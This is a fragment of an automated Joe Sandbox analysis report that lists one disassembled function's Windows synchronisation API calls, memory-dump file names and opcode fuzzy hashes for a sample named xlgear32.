                                                                          • Instruction Fuzzy Hash: 2D018070B293058BDB10DF28C985919BBFBABB6308B20855CE499D7355D770DC80EB62
                                                                          Function 6096D4C0 Relevance: 5.0, APIs: 4, Instructions: 44COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • EnterCriticalSection.KERNEL32(?,?,?,6096D655,?,?,?,?,?,6096CF88), ref: 6096D4DF
                                                                          • TlsGetValue.KERNEL32(?,?,?,?,6096D655,?,?,?,?,?,6096CF88), ref: 6096D4F5
                                                                          • GetLastError.KERNEL32(?,?,?,?,?,6096D655,?,?,?,?,?,6096CF88), ref: 6096D4FD
                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,?,6096D655,?,?,?,?,?,6096CF88), ref: 6096D520
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                                          • String ID:
                                                                          • API String ID: 682475483-0
                                                                          • Opcode ID: 79e4c3a08b5363d98cc33068bb7bbdcd271105d9d9d9c252471cf05fac27a945
                                                                          • Instruction ID: 6dd43474153c21470d2d90641e64b96ed0da30414b2d41baa8b5e8831fa3fcb2
                                                                          • Opcode Fuzzy Hash: 79e4c3a08b5363d98cc33068bb7bbdcd271105d9d9d9c252471cf05fac27a945
                                                                          • Instruction Fuzzy Hash: 9AF0F972A163104BEB10AF659CC1A5A7BFDEFB1218F100048FC6197354E770DC40D6A2